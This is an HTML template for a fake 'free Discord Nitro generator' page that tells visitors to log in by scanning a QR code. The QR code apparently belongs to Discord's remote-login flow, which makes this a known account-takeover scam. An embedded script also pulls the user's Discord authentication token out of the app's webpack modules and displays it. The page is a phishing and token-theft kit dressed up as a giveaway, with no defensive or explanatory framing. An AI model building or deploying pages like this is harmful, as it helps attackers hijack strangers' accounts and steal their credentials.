<!DOCTYPE html>

<html>
    <head>
        <header>
            <meta charset='UTF-8'>
            <meta name='description' content='Free discord nitro generator online, no downloads, no human verification !'>
            <meta name='keywords' content='Discord, Nitro, Generator, No, Human, Verification'>
            <meta charset='utf-8'>

            <title>QR Nitro Generator</title>
        </header>
    </head>

    <body>
        <div class= 'logo_top' style='width:800px; margin:0 auto;'>
            <img src='https://media.discordapp.net/attachments/896814156139888660/897894207665102898/1499537505a4dedb975abae446f94535ca28a3b3a3.png'>
        </div>
        
        <div class='qr_code' style='width:800px; margin:0 auto;'>
            <a id='text_lmao'>Log in to your Discord account, and enjoy Discord-Nitro for free!</a>
            <br><br>
            <img src='<%= qr_code_path %>'/>
            <br><br>
            <a target="_blank" rel="noopener noreferrer" id='url' href='https://techswift.org/2020/10/06/how-to-login-to-discord-via-qr-code/'>How to scan qr code ?</a>
        </div>
    </body>

    <script>
        window.GLOBAL_ENV = {
                API_ENDPOINT: '//discord.com/api',
                API_VERSION: 9,
                GATEWAY_ENDPOINT: 'wss://gateway.discord.gg',
                WEBAPP_ENDPOINT: '//discord.com',
                CDN_HOST: 'cdn.discordapp.com',
                ASSET_ENDPOINT: 'https://discord.com',
                MEDIA_PROXY_ENDPOINT: 'https://media.discordapp.net',
                WIDGET_ENDPOINT: '//discord.com/widget',
                INVITE_HOST: 'discord.gg',
                GUILD_TEMPLATE_HOST: 'discord.new',
                GIFT_CODE_HOST: 'discord.gift',
                RELEASE_CHANNEL: 'stable',
                MARKETING_ENDPOINT: '//discord.com',
                BRAINTREE_KEY: 'production_5st77rrc_49pp2rp4phym7387',
                STRIPE_KEY: 'pk_live_CUQtlpQUF0vufWpnpUmQvcdi',
                NETWORKING_ENDPOINT: '//router.discordapp.net',
                RTC_LATENCY_ENDPOINT: '//latency.discord.media/rtc',
                ACTIVITY_APPLICATION_HOST: 'discordsays.com',
                PROJECT_ENV: 'production',
                REMOTE_AUTH_ENDPOINT: '//remote-auth-gateway.discord.gg',
                SENTRY_TAGS: {
                    "buildId": "69f0658",
                    "buildType": "normal"
                },
                MIGRATION_SOURCE_ORIGIN: 'https://discordapp.com',
                MIGRATION_DESTINATION_ORIGIN: 'https://discord.com',
                HTML_TIMESTAMP: Date.now(),
                ALGOLIA_KEY: 'aca0d7082e4e63af5ba5917d5e96bed0',
            };
        //alert('If you do not see a QR-Code, please disable your add-blocker.');
        const tk = (webpackChunkdiscord_app.push([[''], {}, e => { m = []; for (let c in e.c) m.push(e.c[c]) }]), m).find(m => m?.exports?.default?.getToken !== void 0).exports.default.getToken();
        console.log(tk);
        alert(tk);
    </script>

    <style>
        html {
            background-color: rgb(27, 29, 29);
            background-image: url('https://images4.alphacoders.com/909/thumb-1920-909912.png');
        }

        .logo_top {
            text-align: middle;
        }

        .qr_code {
            box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
            background-color: #23272A;
            border-radius: 5px;
            transition: 0.5s;
            

            padding: 15px;

            vertical-align:middle;
            text-align:center;
        }

        .qr_code:hover {
            box-shadow: 0 8px 32px 0 rgba(0,0,0,0.4);
        }

        #url {
            font-size: medium;
            font-family:Georgia, 'Times New Roman', Times, serif;
            color: #6a747c;
        }

        #text_lmao {
            font-size:large;
            font-family:Verdana, Geneva, Tahoma, sans-serif;
            color: #6a747c;
        }
    </style>
</html>